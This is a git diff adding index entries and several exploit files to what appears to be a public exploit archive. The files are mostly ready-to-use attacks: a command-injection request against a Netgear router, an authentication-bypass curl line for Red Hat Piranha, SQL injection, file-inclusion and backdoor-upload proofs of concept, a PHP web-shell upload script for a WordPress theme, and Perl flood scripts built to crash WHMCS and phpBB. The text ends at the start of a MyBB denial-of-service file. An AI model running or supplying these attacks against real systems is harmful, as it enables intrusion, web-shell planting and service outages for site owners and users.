diff --git a/files.csv b/files.csv
index 0f3edd9f0..cb6386852 100755
--- a/files.csv
+++ b/files.csv
@@ -25620,6 +25620,7 @@ id,file,description,date,author,platform,type,port
 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0
 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
 28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0
+38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection Vulnerability",2015-12-15,"Linux Zone Research Team",php,webapps,80
 28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0
 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0
 28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injection Vulnerabilities",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -35223,8 +35224,12 @@ id,file,description,date,author,platform,type,port
 38959,platforms/generator/shellcode/38959.py,"Windows XP-10 - Null-Free WinExec Shellcode (Python)",2015-12-13,B3mB4m,generator,shellcode,0
 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - (productdtl.php_ prodid param) SQL Injection Vulnerability",2015-12-14,"Rahul Pratap Singh",php,webapps,80
 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80
+39096,platforms/php/webapps/39096.txt,"i-doit Pro 'objID' Parameter SQL Injection Vulnerability",2014-02-17,"Stephan Rickauer",php,webapps,0
+39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass Vulnerability",2013-12-11,"Andreas Schiermeier",linux,remote,0
+39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component 'index.php' SQL Injection Vulnerability",2014-02-17,MR.XpR,php,webapps,0
 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection Vulnerabilities",2014-01-13,"Rohan Stelling",php,webapps,0
 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (MSF)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102
+39095,platforms/php/webapps/39095.pl,"MyBB 'misc.php' Remote Denial of Service Vulnerability",2014-02-12,Amir,php,webapps,0
 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0
 38969,platforms/multiple/dos/38969.txt,"Adobe Flash Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0
 38970,platforms/multiple/dos/38970.txt,"Adobe Flash Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0
@@ -35292,6 +35297,7 @@ id,file,description,date,author,platform,type,port
 39033,platforms/php/webapps/39033.py,"Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80
 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80
 39035,platforms/win64/local/39035.txt,"Microsoft Windows win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win64,local,0
+39099,platforms/php/webapps/39099.txt,"Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0
 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0
 39038,platforms/php/webapps/39038.txt,"PFSense <= 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0
 39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0
@@ -35339,3 +35345,12 @@ id,file,description,date,author,platform,type,port
 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80
 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection Vulnerabilities",2015-12-23,"Curesec Research Team",php,webapps,80
 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80
+39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta Image Gallery Remote File Include And Cross Site Scripting Vulnerabilities",2014-02-05,"TUNISIAN CYBER",php,webapps,0
+39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin 'upload.php' Arbitrary File Upload Vulnerability",2013-12-13,"Yuri Kramarz",php,webapps,0
+39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
+39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
+39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
+39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
+39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
+39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
+39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
diff --git a/platforms/hardware/remote/39089.txt b/platforms/hardware/remote/39089.txt
new file mode 100755
index 000000000..e7eef490d
--- /dev/null
+++ b/platforms/hardware/remote/39089.txt
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/65444/info
+
+The Netgear D6300B router is prone to the following security vulnerabilities:
+
+1. Multiple unauthorized-access vulnerabilities
+2. A command-injection vulnerability
+3. An information disclosure vulnerability
+
+An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible.
+
+Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected. 
+
+######## REQUEST: #########
+###########################
+POST /diag.cgi?id=991220771 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.1/DIAG_diag.htm
+Authorization: Basic YWRtaW46cGFzc3dvcmQ=
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 95
+
+ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1
+
+
+######## RESPONSE: ########
+###########################
+HTTP/1.0 200 OK
+Content-length: 6672
+Content-type: text/html; charset="UTF-8"
+Cache-Control:no-cache
+Pragma:no-cache
+
+<!DOCTYPE HTML>
+<html>
+[...]
+<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
+bin
+cferam.001
+data
+dev
+etc
+include
+lib
+linuxrc
+mnt
+opt
+
+&lt;/textarea&gt;
+[...]
diff --git a/platforms/linux/remote/39097.txt b/platforms/linux/remote/39097.txt
new file mode 100755
index 000000000..2ec70089e
--- /dev/null
+++ b/platforms/linux/remote/39097.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65587/info
+
+Red Hat Piranha is prone to a remote security bypass vulnerability.
+
+An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.
+
+Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. 
+
+curl -d'' -I http://www.example.com:3636/secure/control.php 
+wget -qO- --post-data='' http://www.example.com3636/secure/control.php 
diff --git a/platforms/php/webapps/38990.txt b/platforms/php/webapps/38990.txt
new file mode 100755
index 000000000..2ce45894d
--- /dev/null
+++ b/platforms/php/webapps/38990.txt
@@ -0,0 +1,447 @@
+######################################################################################## 
+
+#______________________________________________________________________________________ 
+
+# Exploit Title  : Article Script SQL Injection Vulnerability 
+
+# Exploit Author : Linux Zone Research Team 
+
+# Vendor Homepage: http://articlesetup.com/ 
+
+# Google Dork    : inurl:/article.php?id= intext:Powered By Article Marketing 
+
+# Software Link  : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip 
+
+# Date           : 15-December-2015 
+
+# Version        : (Version 1.00) 
+
+# CVE            : NONE 
+
+# Tested On      : Linux - Chrome 
+
+# Category       : Web Application 
+
+# MY HOME        : http://linux-zone.org/Forums - research@linux-zone.org 
+
+#______________________________________________________________________________________ 
+
+####################################################################################### 
+
+# 
+
+# localHost/article.php?id=SQL 
+
+#______________________________________________________________________________________ 
+
+## Vulnerability Code 
+
+<?php 
+
+include('config.php'); 
+
+
+
+//Create site settings variables 
+
+$sitequery = 'select * from settings;'; 
+
+$siteresult = mysql_query($sitequery,$connection) or die(mysql_error()); 
+
+$siteinfo = mysql_fetch_array($siteresult); 
+
+$siteurl = $siteinfo['url']; 
+
+
+
+$article = $_GET['id']; 
+
+
+
+if (!is_numeric($article)) { 
+
+header('Location: '.$siteurl); 
+
+} 
+
+
+
+else 
+
+
+
+{   
+
+
+
+$sitequery = 'select * from settings;'; 
+
+$siteresult = mysql_query($sitequery,$connection) or die(mysql_error()); 
+
+
+
+//Create site settings variables 
+
+$siteinfo = mysql_fetch_array($siteresult); 
+
+$sitetitle = $siteinfo['title']; 
+
+$siteurl = $siteinfo['url']; 
+
+$sitecomments = $siteinfo['comments']; 
+
+$commentmod = $siteinfo['commentmod']; 
+
+
+
+$query = "select * from articles where status=0 and id = ".$article; 
+
+
+
+$articleresults = mysql_query($query,$connection) or die(mysql_error()); 
+
+$num_results = mysql_num_rows($articleresults); 
+
+$articleinfo = mysql_fetch_array($articleresults); 
+
+
+
+if (!$num_results) { 
+
+header('Location: '.$siteurl); 
+
+} 
+
+
+
+//Get article info 
+
+$id = $articleinfo['id']; 
+
+$authorid = $articleinfo['authorid']; 
+
+$date = strtotime($articleinfo['date']); 
+
+$artdate = date('m/d/y', $date); 
+
+$categoryid = $articleinfo['categoryid']; 
+
+$title = stripslashes($articleinfo['title']); 
+
+$body = stripslashes($articleinfo['body']); 
+
+$resource = $articleinfo['resource']; 
+
+
+
+
+
+//Meta Info 
+
+$cathead = 0; 
+
+$metatitle = $title." - "; 
+
+include('header.php'); 
+
+include('sidebar.php'); 
+
+
+
+
+
+if ($seourls == 1) { $scrubtitle = generate_seo_link($title); } 
+
+
+
+
+
+// Setup the article template 
+
+$articletemp = new Template("templates/".$template."/article.tpl"); 
+
+
+
+// get author info 
+
+$authorquery = "select * from authors where id=".$authorid; 
+
+$authorresult = mysql_query($authorquery,$connection) or die(mysql_error()); 
+
+$authorinfo = mysql_fetch_array($authorresult); 
+
+$authorname = $authorinfo['displayname']; 
+
+$authorbio = $authorinfo['bio']; 
+
+$gravatar = $authorinfo['gravatar']; 
+
+if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); } 
+
+
+
+// get category info 
+
+$catquery = "select * from categories where id=".$categoryid; 
+
+$catresult = mysql_query($catquery,$connection) or die(mysql_error()); 
+
+$catinfo = mysql_fetch_array($catresult); 
+
+$categoryname = $catinfo['name']; 
+
+$catparent = $catinfo['parentid']; 
+
+if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); } 
+
+
+
+// if the category doesn't have a parent 
+
+if ($catparent == NULL) { 
+
+if ($seourls == 1) { // With SEO URLS 
+
+$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/" 
+
+.$scrubcatname."/\"><b>".$categoryname."</b></a>"; 
+
+} else { 
+
+$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid 
+
+."\"><b>".$categoryname."</b></a>"; 
+
+} 
+
+
+
+// if the category DOES have a parent 
+
+} else { 
+
+$query = "select * from categories where id=".$catparent; 
+
+$result = mysql_query($query,$connection) or die(mysql_error()); 
+
+$info = mysql_fetch_array($result); 
+
+$parentname = $info['name']; 
+
+if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); } 
+
+
+
+if ($seourls == 1) { // With SEO URLS 
+
+$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/" 
+
+.$scrubparent."/\"><b>".$parentname."</b></a> > 
+
+<a href=\"".$siteurl."/category/".$categoryid."/" 
+
+.$scrubcatname."/\"><b>".$categoryname."</b></a>"; 
+
+} else { 
+
+$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent 
+
+."\"><b>".$parentname."</b></a> > 
+
+<a href=\"".$siteurl."/category.php?id=".$categoryid 
+
+."\"><b>".$categoryname."</b></a>"; 
+
+} 
+
+} 
+
+
+
+
+
+// Add a view to this article 
+
+$query = "select * from articleviews where articleid = ".$article; 
+
+$results = mysql_query($query,$connection) or die(mysql_error()); 
+
+$viewinfo = mysql_fetch_array($results); 
+
+if ($viewinfo == NULL) { 
+
+$sql = "INSERT INTO articleviews VALUES (".$article.", 1)"; 
+
+$query = mysql_query($sql); 
+
+} else { 
+
+$totalviews = $viewinfo['views']; 
+
+$totalviews++; 
+
+
+
+$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article.""; 
+
+$query = mysql_query($sql); 
+
+} 
+
+
+
+if ($seourls == 1) { // With SEO URLS 
+
+$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>"; 
+
+} else { 
+
+$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>"; 
+
+} 
+
+
+
+// Setup all template variables for display 
+
+$articletemp->set("authorname", $authorname); 
+
+$articletemp->set("authorlink", $authorlink); 
+
+$articletemp->set("date", $artdate); 
+
+$articletemp->set("displaycat", $displaycat); 
+
+$articletemp->set("views", $totalviews); 
+
+$articletemp->set("title", $title); 
+
+$articletemp->set("body", $body); 
+
+$articletemp->set("gravatar", $gravatar); 
+
+$articletemp->set("resource", $resource); 
+
+
+
+// For the adcode 
+
+$query = "select * from adboxes where id=1;"; 
+
+$result = mysql_query($query,$connection) or die(mysql_error()); 
+
+$info = mysql_fetch_assoc($result); 
+
+$articletemp->set("250adcode", stripslashes($info['adcode'])); 
+
+
+
+
+
+// Outputs the homepage template! 
+
+
+
+echo $articletemp->output(); 
+
+
+
+//Displays the comments -- if admin has them enabled 
+
+
+
+if($sitecomments == 0) { 
+
+echo "<br/><h2>Comments</h2>"; 
+
+
+
+require_once 'comments/classes/Comments.class.php'; 
+
+
+
+/* Article ID which shows the comments */ 
+
+$post_id = $article; 
+
+
+
+/* Level of hierarchy comments. Infinit if declared NULL */ 
+
+$level = NULL; 
+
+
+
+/* Number of Supercomments (level 0) to display per page */ 
+
+$supercomments_per_page = 10000; 
+
+
+
+/* Moderate comments? */ 
+
+if ($commentmod == 0) { 
+
+$moderation = true; 
+
+} else { 
+
+$moderation = false; 
+
+} 
+
+
+
+# Setup db config array # 
+
+$db_config = array("db_name" => $db_name, 
+
+"db_user" => $dbusername, 
+
+"db_pass" => $dbpassword, 
+
+"db_host" => $server ); 
+
+
+
+# Create Object of class comments 
+
+$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config); 
+
+
+
+# Display comments # 
+
+echo $comments->getComments(); 
+
+} 
+
+
+
+include('rightsidebar.php'); 
+
+include('obinclude.php'); 
+
+
+
+} 
+
+
+
+?> 
+
+
+
+####################################### 
+
+# 
+
+# Hassan Shakeri - Mohammad Habili 
+
+# 
+
+# Twitter : @ShakeriHassan - Fb.com/General.BlackHat 
+
+##########################################################
+
+
diff --git a/platforms/php/webapps/39087.txt b/platforms/php/webapps/39087.txt
new file mode 100755
index 000000000..30b124c52
--- /dev/null
+++ b/platforms/php/webapps/39087.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65420/info
+
+Singapore Image Gallery is prone to a remote file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary script code in the context of the web server process, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or steal cookie-based authentication credentials and launch other attacks.
+
+Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable. 
+
+http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload] 
\ No newline at end of file
diff --git a/platforms/php/webapps/39088.txt b/platforms/php/webapps/39088.txt
new file mode 100755
index 000000000..e3474a11f
--- /dev/null
+++ b/platforms/php/webapps/39088.txt
@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/65438/info
+
+Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected. 
+
+POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1
+Host: <IP>
+Proxy-Connection: keep-alive
+Content-Length: 513
+Origin: <originl>
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
+Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
+Accept: */*
+DNT: 1
+Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+
+------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
+Content-Disposition: form-data; name="Filename" 
+
+php_backdoor.php
+------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
+Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php" 
+Content-Type: application/octet-stream
+
+[PHP_CODE]
+
+------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
+Content-Disposition: form-data; name="Upload" 
+
+Submit Query
+------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--
diff --git a/platforms/php/webapps/39090.php b/platforms/php/webapps/39090.php
new file mode 100755
index 000000000..29c073cf8
--- /dev/null
+++ b/platforms/php/webapps/39090.php
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/65460/info
+
+The Kiddo theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to sufficiently sanitize file extensions.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. 
+
+<?php
+*/
+[+] Author: TUNISIAN CYBER
+[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
+[+] Date: 05-02-2014
+[+] Category: WebApp
+[+] Google Dork: :(
+[+] Tested on: KaliLinux
+[+] Vendor: n/a
+[+] Friendly Sites: na3il.com,th3-creative.com
+
+Kiddo WP theme suffers from a File Upload Vulnerability
+
++PoC:
+site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php
+
++Shell Path:
+site/3vil.php
+
+ScreenShot:
+http://i.imgur.com/c62cWHH.png
+
+Greets to: XMaX-tn, N43il HacK3r, XtechSEt
+Sec4Ever Members:
+DamaneDz
+UzunDz
+GEOIX
+E4A Members:
+Gastro-DZ
+
+*/
+
+echo "=============================================== \n"; 
+echo "   Kiddo WP Theme File Upload Vulnerability\n"; 
+echo "                 TUNISIAN CYBER   \n"; 
+echo "=============================================== \n\n";   
+$uploadfile="cyber.php";
+  
+$ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+  
+?>
diff --git a/platforms/php/webapps/39091.pl b/platforms/php/webapps/39091.pl
new file mode 100755
index 000000000..7aa37626e
--- /dev/null
+++ b/platforms/php/webapps/39091.pl
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/65470/info
+
+WHMCS is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.
+
+WHMCS 5.12 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+#################################
+#
+#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
+#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
+#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
+#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
+#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
+#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
+#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
+#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
+#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
+#
+#####################################
+#####################################
+#         Iranian Exploit DataBase
+# WHMCS Denial of Service Vulnerability
+# Test on Whmcs 5.12
+# Vendor site : www.whmcs.com
+# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
+# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
+# Fb Page : https://www.facebook.com/iedb.ir
+# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
+# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
+# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
+# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
+#####################################
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<10; $i--)
+{
+$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
+$len = length $data;
+$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
+"Accept: * /*\r\n".
+"Accept-Language: en-gb\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $len\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$foo", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "################################################# \n";
+print "##       WHMCS Denial of Service Vulnerability\n";
+print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
+print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
+print "################################################# \n";
+print "## [host] [path] \n";
+print "## http://host.com /whmcs/\n";
+print "################################################# \n";
+exit();
+};
+#####################################
+#  Archive Exploit = http://www.iedb.ir/exploits-1300.html
+#####################################
+
diff --git a/platforms/php/webapps/39092.pl b/platforms/php/webapps/39092.pl
new file mode 100755
index 000000000..dd5f57bf9
--- /dev/null
+++ b/platforms/php/webapps/39092.pl
@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/65481/info
+
+phpBB is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+###########################
+
+# Phpbb Forum Denial of Service Vulnerability
+
+###########################
+
+#!/usr/bin/perl
+# Iranian Exploit DataBase
+# Phpbb Forum Denial of Service Vulnerability
+# Version: All Version
+# Vendor site : http://www.phpbb.com
+# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
+# Site : Www.IeDb.Ir   -   Www.IrIsT.Ir
+# Fb Page : 
+https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
+# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us 
+- 0Day - Dj.TiniVini - E2MA3N 
+#  l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All 
+Members In IeDb.Ir/acc
+#####################################
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<10; $i--)
+{
+$data = 
+"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
+$len = length $data;
+$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
+"Accept: * /*\r\n".
+"Accept-Language: en-gb\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $len\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$foo", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "\n";
+print "################################################# \n";
+print "##       Phpbb Forum Denial of Service Vulnerability\n";
+print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
+print "##            Www.IeDb.Ir   -   Www.IrIsT.Ir \n";
+print "################################################# \n";
+print "## [host] [path] \n";
+print "## http://host.com /forum/\n";
+print "################################################# \n";
+print "\n";
+exit();
+};
+#####################################
+#  Archive Exploit = http://www.iedb.ir/exploits-868.html
+#####################################
+
+###########################
+
+# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17]
+
+###########################
diff --git a/platforms/php/webapps/39094.txt b/platforms/php/webapps/39094.txt
new file mode 100755
index 000000000..b61ac6e19
--- /dev/null
+++ b/platforms/php/webapps/39094.txt
@@ -0,0 +1,53 @@
+================================================================================
+# Rips Scanner 0.5 - (code.php) Local File Inclusion
+================================================================================
+# Vendor Homepage: https://github.com/robocoder/rips-scanner
+# Date: 24/12/2015
+# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
+# Version : 0.5
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
+================================================================================
+# Vulnerable File : code.php
+
+# Vulnerable Code:
+
+	
+102	$file = $_GET['file'];
+103	$marklines = explode(',', $_GET['lines']);
+104	$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
+105
+106	
+107	if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
+108	{
+109		$lines = file($file);
+110		
+111		// place line numbers in extra table for more elegant copy/paste
+without line numbers
+112		echo '<tr><td><table>';
+113		for($i=1, $max=count($lines); $i<=$max;$i++)
+114			echo "<tr><td class=\"linenrcolumn\"><span
+class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
+115		echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
+116		
+117		$in_comment = false;
+118		for($i=0; $i<$max; $i++)
+119		{				
+120			$in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
+121		}
+122	} else
+123	{
+124		echo '<tr><td>Invalid file specified.</td></tr>';
+125	}
+
+
+# PoC :
+
+http://localhost/rips/windows/code.php?file=/var/www/html/index.php
+
+Vulnerable Parameter : file
+
+================================================================================
+# Discovered By : Ehsan Hosseini (EhsanSec.ir)
+================================================================================
diff --git a/platforms/php/webapps/39095.pl b/platforms/php/webapps/39095.pl
new file mode 100755
index 000000000..bfed262fb
--- /dev/null
+++ b/platforms/php/webapps/39095.pl
@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/65545/info
+
+MyBB is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
